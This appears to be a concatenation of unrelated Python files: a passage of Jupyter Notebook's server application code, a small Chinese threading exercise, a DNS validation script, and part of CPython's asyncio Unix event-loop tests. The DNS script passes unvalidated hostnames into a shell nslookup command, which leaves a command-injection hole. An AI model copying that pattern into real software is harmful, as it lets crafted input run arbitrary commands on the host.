# do not trust windows registry, which regularly has bad info
mimetypes.init(files=[])
# ensure css, js are correct, which are required for pages to function
mimetypes.add_type('text/css', '.css')
mimetypes.add_type('application/javascript', '.js')
# for python <3.8
mimetypes.add_type('application/wasm', '.wasm')
def shutdown_no_activity(self):
"""Shutdown server on timeout when there are no kernels or terminals."""
km = self.kernel_manager
if len(km) != 0:
return # Kernels still running
if self.terminals_available:
term_mgr = self.web_app.settings['terminal_manager']
if term_mgr.terminals:
return # Terminals still running
seconds_since_active = \
(utcnow() - self.web_app.last_activity()).total_seconds()
self.log.debug("No activity for %d seconds.",
seconds_since_active)
if seconds_since_active > self.shutdown_no_activity_timeout:
self.log.info("No kernels or terminals for %d seconds; shutting down.",
seconds_since_active)
self.stop()
def init_shutdown_no_activity(self):
if self.shutdown_no_activity_timeout > 0:
self.log.info("Will shut down after %d seconds with no kernels or terminals.",
self.shutdown_no_activity_timeout)
pc = ioloop.PeriodicCallback(self.shutdown_no_activity, 60000)
pc.start()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overrideable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
With the introduction of the async kernel, the existing sync kernel
requires the use of nested loops in order to run code synchronously.
This is done in `jupyter_client` using the helper util `run_sync`:
ref: https://github.com/jupyter/jupyter_client/blob/f453b51eeeff9e905c583b7da3905c0e35cfbdf0/jupyter_client/utils.py#L11
which creates a new event loop and relies on `nest_asyncio` patching
to allow nested loops. This requires that *all* potential tasks are
patched before executing. When only some tasks are patched it leads to
the following issue:
ref: https://github.com/jupyter/notebook/issues/6164
So we must call `nest_asyncio.apply()` method as early as possible. It
is preferable to do this in the consuming application rather than the
`jupyter_client` as it is a global patch and would impact all consumers
rather than just the ones that rely on synchronous kernel behavior.
"""
import nest_asyncio
try:
nest_asyncio.apply()
except RuntimeError:
# nest_asyncio requires a running loop in order to patch.
# In tests the loop may not have been created yet.
pass
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
@catch_config_error
def initialize(self, argv=None):
self._init_asyncio_patch()
super().initialize(argv)
self.init_logging()
if self._dispatching:
return
self.init_resources()
self.init_configurables()
self.init_server_extension_config()
self.init_components()
self.init_webapp()
self.init_terminals()
self.init_signal()
self.init_server_extensions()
self.init_mime_overrides()
self.init_shutdown_no_activity()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext('Shutting down %d kernel', 'Shutting down %d kernels', n_kernels)
self.log.info(kernel_msg % n_kernels)
run_sync(self.kernel_manager.shutdown_all())
def cleanup_terminals(self):
"""Shutdown all terminals.
The terminals will shutdown themselves when this process no longer exists,
but explicit shutdown allows the TerminalManager to cleanup.
"""
if not self.terminals_available:
return
terminal_manager = self.web_app.settings['terminal_manager']
n_terminals = len(terminal_manager.list())
terminal_msg = trans.ngettext('Shutting down %d terminal', 'Shutting down %d terminals', n_terminals)
self.log.info(terminal_msg % n_terminals)
run_sync(terminal_manager.terminate_all())
def notebook_info(self, kernel_count=True):
"Return the current working directory and the server url information"
info = self.contents_manager.info_string() + "\n"
if kernel_count:
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext("%d active kernel", "%d active kernels", n_kernels)
info += kernel_msg % n_kernels
info += "\n"
# Format the info so that the URL fits on a single line in 80 char display
info += _("Jupyter Notebook {version} is running at:\n{url}".
format(version=NotebookApp.version, url=self.display_url))
if self.gateway_config.gateway_enabled:
info += _("\nKernels will be managed by the Gateway server running at:\n%s") % self.gateway_config.url
return info
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'sock': self.sock,
'secure': bool(self.certfile),
'base_url': self.base_url,
'token': self.token,
'notebook_dir': os.path.abspath(self.notebook_dir),
'password': bool(self.password),
'pid': os.getpid(),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
try:
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2, sort_keys=True)
except OSError as e:
self.log.error(_("Failed to write server-info to %s: %s"),
self.info_file, e)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def write_browser_open_file(self):
"""Write an nbserver-<pid>-open.html file
This can be used to open the notebook in a browser
"""
# default_url contains base_url, but so does connection_url
open_url = self.default_url[len(self.base_url):]
with open(self.browser_open_file, 'w', encoding='utf-8') as f:
self._write_browser_open_file(open_url, f)
def _write_browser_open_file(self, url, fh):
if self.token:
url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, url)
jinja2_env = self.web_app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url))
def remove_browser_open_file(self):
"""Remove the nbserver-<pid>-open.html file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.browser_open_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
if not self.use_redirect_file:
uri = self.default_url[len(self.base_url):]
if self.token:
uri = url_concat(uri, {'token': self.token})
if self.file_to_run:
if not os.path.exists(self.file_to_run):
self.log.critical(_("%s does not exist") % self.file_to_run)
self.exit(1)
relpath = os.path.relpath(self.file_to_run, self.notebook_dir)
uri = url_escape(url_path_join('notebooks', *relpath.split(os.sep)))
# Write a temporary file to open in the browser
fd, open_file = tempfile.mkstemp(suffix='.html')
with open(fd, 'w', encoding='utf-8') as fh:
self._write_browser_open_file(uri, fh)
else:
open_file = self.browser_open_file
if self.use_redirect_file:
assembled_url = urljoin('file:', pathname2url(open_file))
else:
assembled_url = url_path_join(self.connection_url, uri)
b = lambda: browser.open(assembled_url, new=self.webbrowser_open_new)
threading.Thread(target=b).start()
def start(self):
""" Start the Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
super().start()
if not self.allow_root:
# check if we are running as root, and abort if it's not allowed
try:
uid = os.geteuid()
except AttributeError:
uid = -1 # anything nonzero here, since we can't check UID assume non-root
if uid == 0:
self.log.critical(_("Running as root is not recommended. Use --allow-root to bypass."))
self.exit(1)
success = self._bind_http_server()
if not success:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
self.exit(1)
info = self.log.info
for line in self.notebook_info(kernel_count=False).split("\n"):
info(line)
info(_("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation)."))
if 'dev' in notebook.__version__:
info(_("Welcome to Project Jupyter! Explore the various tools available"
" and their corresponding documentation. If you are interested"
" in contributing to the platform, please visit the community"
"resources section at https://jupyter.org/community.html."))
self.write_server_info_file()
self.write_browser_open_file()
if (self.open_browser or self.file_to_run) and not self.sock:
self.launch_browser()
if self.token and self._token_generated:
# log full URL with generated token, so there's a copy/pasteable link
# with auth info.
if self.sock:
self.log.critical('\n'.join([
'\n',
'Notebook is listening on %s' % self.display_url,
'',
(
'UNIX sockets are not browser-connectable, but you can tunnel to '
'the instance via e.g.`ssh -L 8888:%s -N user@this_host` and then '
'open e.g. %s in a browser.'
) % (self.sock, self._concat_token(self._tcp_url('localhost', 8888)))
]))
else:
if not self.custom_display_url:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste one of these URLs:',
' %s' % self.display_url,
]))
else:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste this URL:',
' %s' % self.display_url,
]))
self.io_loop = ioloop.IOLoop.current()
if sys.platform.startswith('win'):
# add no-op to wake every 5s
# to handle signals that may be ignored by the inner loop
pc = ioloop.PeriodicCallback(lambda : None, 5000)
pc.start()
try:
self.io_loop.start()
except KeyboardInterrupt:
info(_("Interrupted..."))
finally:
self.remove_server_info_file()
self.remove_browser_open_file()
self.cleanup_kernels()
self.cleanup_terminals()
def stop(self):
def _stop():
self.http_server.stop()
self.io_loop.stop()
self.io_loop.add_callback(_stop)
def list_running_servers(runtime_dir=None):
"""Iterate over the server info files of running notebook servers.
Given a runtime directory, find nbserver-* files in the security directory,
and yield dicts of their information, each one pertaining to
a currently running notebook server instance.
"""
if runtime_dir is None:
runtime_dir = jupyter_runtime_dir()
# The runtime dir might not exist
if not os.path.isdir(runtime_dir):
return
for file_name in os.listdir(runtime_dir):
if re.match('nbserver-(.+).json', file_name):
with io.open(os.path.join(runtime_dir, file_name), encoding='utf-8') as f:
info = json.load(f)
# Simple check whether that process is really still running
# Also remove leftover files from IPython 2.x without a pid field
if ('pid' in info) and check_pid(info['pid']):
yield info
else:
# If the process has died, try to delete its info file
try:
os.unlink(os.path.join(runtime_dir, file_name))
except OSError:
pass # TODO: This should warn or log or something
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
main = launch_new_instance = NotebookApp.launch_instance
|
1.2.py
|
'''
多线程
'''
import datetime
import threading
def fbnq(n):
summ=0
if n==0:
summ=0
elif n==1:
summ=1
elif n>=2:
summ=summ+fbnq(n-1)+fbnq(n-2)
return summ
def jiecheng(n):
if n==1:
return 1
else:
return n*jiecheng(n-1)
def sumn(n):
summ=0
for i in range(0,n+1):
summ+=i
return summ
if __name__=="__main__":
start=datetime.datetime.now()
t1=threading.Thread(target=fbnq,args=(15,))
t1.start()
t2=threading.Thread(target=jiecheng,args=(15,))
t2.start()
t3=threading.Thread(target=sumn,args=(15,))
t3.start()
print("斐波那契数列的第{}项是{}".format(15,fbnq(15)))
print("{}的阶乘是{}".format(15, jiecheng(15)))
print("前{}项的和是{}".format(15, sumn(15)))
t1.join()
t2.join()
t3.join()
end=datetime.datetime.now()
print(end-start)
|
dns_validator.py
|
#!/usr/bin/python3
import subprocess
import ipaddress
import socket
import threading
import logging
def valid_ip(address):
try:
ipaddress.ip_address(address)
return True
except:
return False
def get_ipresolver_output(ip,IP_STATUS,HOSTNAME):
try:
STATUS=valid_ip(ip)
if STATUS == True:
command="nslookup "+str(ip)+" > /dev/null;echo $? "
output=subprocess.getoutput(command)
if output == '0':
IP_STATUS[ip]="O.K"
#get hostname from given ip
hostname=socket.gethostbyaddr(ip)[0]
HOSTNAME[ip]=hostname
else:
IP_STATUS[ip]="FAILED"
HOSTNAME[ip]="FAILED"
else:
IP_STATUS[ip]="N/A"
HOSTNAME[ip]="N/A"
except Exception as e:
IP_STATUS[ip]="N/A"
HOSTNAME[ip]="N/A"
def get_nameresolver_output(hostname,IP_LIST):
try:
command="nslookup "+str(hostname)+" > /dev/null;echo $? "
output=subprocess.getoutput(command)
if output == '0':
#get ip from given hostname
ip=socket.gethostbyname(hostname)
IP_LIST[hostname]=ip
else:
IP_LIST[hostname]="FAILED"
except Exception as e:
logging.error(e)
IP_LIST[hostname]="FAILED"
def ip_resolution_check(IP_LIST):
IP_STATUS={}
HOSTNAME={}
try:
for ip in IP_LIST:
t=threading.Thread(target=get_ipresolver_output,args=(ip,IP_STATUS,HOSTNAME))
t.start()
t.join()
return IP_STATUS,HOSTNAME
except Exception as e:
logging.error(e)
IP_STATUS={}
HOSTNAME={}
return IP_STATUS,HOSTNAME
def hostname_resolution_check(HOSTNAME_LIST):
try:
IP_LIST={}
for hostname in HOSTNAME_LIST:
if hostname =='':
IP_LIST[" "]="FAILED"
else:
t=threading.Thread(target=get_nameresolver_output,args=(hostname,IP_LIST))
t.start()
t.join()
return IP_LIST
except Exception as e:
logging.error(e)
IP_LIST={}
return IP_LIST
|
test_unix_events.py
|
"""Tests for unix_events.py."""
import collections
import contextlib
import errno
import io
import os
import pathlib
import signal
import socket
import stat
import sys
import tempfile
import threading
import unittest
from unittest import mock
from test import support
if sys.platform == 'win32':
raise unittest.SkipTest('UNIX only')
import asyncio
from asyncio import log
from asyncio import unix_events
from test.test_asyncio import utils as test_utils
MOCK_ANY = mock.ANY
def tearDownModule():
asyncio.set_event_loop_policy(None)
def close_pipe_transport(transport):
# Don't call transport.close() because the event loop and the selector
# are mocked
if transport._pipe is None:
return
transport._pipe.close()
transport._pipe = None
@unittest.skipUnless(signal, 'Signals are not supported')
class SelectorEventLoopSignalTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
def test_check_signal(self):
self.assertRaises(
TypeError, self.loop._check_signal, '1')
self.assertRaises(
ValueError, self.loop._check_signal, signal.NSIG + 1)
def test_handle_signal_no_handler(self):
self.loop._handle_signal(signal.NSIG + 1)
def test_handle_signal_cancelled_handler(self):
h = asyncio.Handle(mock.Mock(), (),
loop=mock.Mock())
h.cancel()
self.loop._signal_handlers[signal.NSIG + 1] = h
self.loop.remove_signal_handler = mock.Mock()
self.loop._handle_signal(signal.NSIG + 1)
self.loop.remove_signal_handler.assert_called_with(signal.NSIG + 1)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_setup_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
m_signal.set_wakeup_fd.side_effect = ValueError
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_coroutine_error(self, m_signal):
m_signal.NSIG = signal.NSIG
async def simple_coroutine():
pass
# callback must not be a coroutine function
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
self.assertRaisesRegex(
TypeError, 'coroutines cannot be used with add_signal_handler',
self.loop.add_signal_handler,
signal.SIGINT, func)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
cb = lambda: True
self.loop.add_signal_handler(signal.SIGHUP, cb)
h = self.loop._signal_handlers.get(signal.SIGHUP)
self.assertIsInstance(h, asyncio.Handle)
self.assertEqual(h._callback, cb)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_install_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
def set_wakeup_fd(fd):
if fd == -1:
raise ValueError()
m_signal.set_wakeup_fd = set_wakeup_fd
class Err(OSError):
errno = errno.EFAULT
m_signal.signal.side_effect = Err
self.assertRaises(
Err,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error2(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.loop._signal_handlers[signal.SIGHUP] = lambda: True
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(1, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error3(self, m_logging, m_signal):
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(2, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGHUP))
self.assertTrue(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGHUP, m_signal.SIG_DFL), m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.SIGINT = signal.SIGINT
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGINT, lambda: True)
self.loop._signal_handlers[signal.SIGHUP] = object()
m_signal.set_wakeup_fd.reset_mock()
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGINT))
self.assertFalse(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGINT, m_signal.default_int_handler),
m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_remove_signal_handler_cleanup_error(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.set_wakeup_fd.side_effect = ValueError
self.loop.remove_signal_handler(signal.SIGHUP)
self.assertTrue(m_logging.info)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.signal.side_effect = OSError
self.assertRaises(
OSError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.assertRaises(
RuntimeError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_close(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.loop.add_signal_handler(signal.SIGCHLD, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 2)
m_signal.set_wakeup_fd.reset_mock()
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
m_signal.set_wakeup_fd.assert_called_once_with(-1)
@mock.patch('asyncio.unix_events.sys')
@mock.patch('asyncio.unix_events.signal')
def test_close_on_finalizing(self, m_signal, m_sys):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 1)
m_sys.is_finalizing.return_value = True
m_signal.signal.reset_mock()
with self.assertWarnsRegex(ResourceWarning,
"skipping signal handlers removal"):
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
self.assertFalse(m_signal.signal.called)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'),
'UNIX Sockets are not supported')
class SelectorEventLoopUnixSocketTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@support.skip_unless_bind_unix_socket
def test_create_unix_server_existing_path_sock(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX)
sock.bind(path)
sock.listen(1)
sock.close()
coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@support.skip_unless_bind_unix_socket
def test_create_unix_server_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
srv_coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(srv_coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_create_unix_connection_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
coro = self.loop.create_unix_connection(lambda: None, path)
with self.assertRaises(FileNotFoundError):
# If pathlib.Path wasn't supported, the exception would be
# different.
self.loop.run_until_complete(coro)
def test_create_unix_server_existing_path_nonsock(self):
with tempfile.NamedTemporaryFile() as file:
coro = self.loop.create_unix_server(lambda: None, file.name)
with self.assertRaisesRegex(OSError,
'Address.*is already in use'):
self.loop.run_until_complete(coro)
def test_create_unix_server_ssl_bool(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl=True)
with self.assertRaisesRegex(TypeError,
'ssl argument must be an SSLContext'):
self.loop.run_until_complete(coro)
def test_create_unix_server_nopath_nosock(self):
coro = self.loop.create_unix_server(lambda: None, path=None)
with self.assertRaisesRegex(ValueError,
'path was not specified, and no sock'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_dgram(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
@support.skip_unless_bind_unix_socket
def test_create_unix_server_path_stream_bittype(self):
sock = socket.socket(
socket.AF_UNIX, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with tempfile.NamedTemporaryFile() as file:
fn = file.name
try:
with sock:
sock.bind(fn)
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
finally:
os.unlink(fn)
def test_create_unix_server_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_connection(lambda: None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.unix_events.socket')
def test_create_unix_server_bind_error(self, m_socket):
# Ensure that the socket is closed on any bind error
sock = mock.Mock()
m_socket.socket.return_value = sock
sock.bind.side_effect = OSError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
sock.bind.side_effect = MemoryError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(MemoryError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_unix_connection_path_sock(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, sock=object())
with self.assertRaisesRegex(ValueError, 'path and sock can not be'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nopath_nosock(self):
coro = self.loop.create_unix_connection(
lambda: None, None)
with self.assertRaisesRegex(ValueError,
'no path and sock were specified'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nossl_serverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, server_hostname='spam')
with self.assertRaisesRegex(ValueError,
'server_hostname is only meaningful'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_noserverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, ssl=True)
with self.assertRaisesRegex(
ValueError, 'you have to pass server_hostname when using ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_connection(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(os, 'sendfile'),
'sendfile is not supported')
class SelectorEventLoopUnixSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
self._ready = loop.create_future()
def connection_made(self, transport):
self.started = True
self.transport = transport
self._ready.set_result(None)
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, cleanup=True):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
if cleanup:
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
port = support.find_unused_port()
srv_sock = self.make_socket(cleanup=False)
srv_sock.bind((support.HOST, port))
server = self.run_loop(self.loop.create_server(
lambda: proto, sock=srv_sock))
self.run_loop(self.loop.sock_connect(sock, (support.HOST, port)))
self.run_loop(proto._ready)
def cleanup():
proto.transport.close()
self.run_loop(proto.wait_closed())
server.close()
self.run_loop(server.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test_sock_sendfile_not_available(self):
sock, proto = self.prepare()
with mock.patch('asyncio.unix_events.os', spec=[]):
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"os[.]sendfile[(][)] is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_a_file(self):
sock, proto = self.prepare()
f = object()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_iobuffer(self):
sock, proto = self.prepare()
f = io.BytesIO()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_regular_file(self):
sock, proto = self.prepare()
f = mock.Mock()
f.fileno.return_value = -1
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_cancel1(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
with contextlib.suppress(asyncio.CancelledError):
self.run_loop(fut)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_cancel2(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_blocking_error(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = mock.Mock()
fut.cancelled.return_value = False
with mock.patch('os.sendfile', side_effect=BlockingIOError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
key = self.loop._selector.get_key(sock)
self.assertIsNotNone(key)
fut.add_done_callback.assert_called_once_with(mock.ANY)
def test_sock_sendfile_os_error_first_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
with mock.patch('os.sendfile', side_effect=OSError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIsInstance(exc, asyncio.SendfileNotAvailableError)
self.assertEqual(0, self.file.tell())
def test_sock_sendfile_os_error_next_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = OSError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
def test_sock_sendfile_exception(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = asyncio.SendfileNotAvailableError()
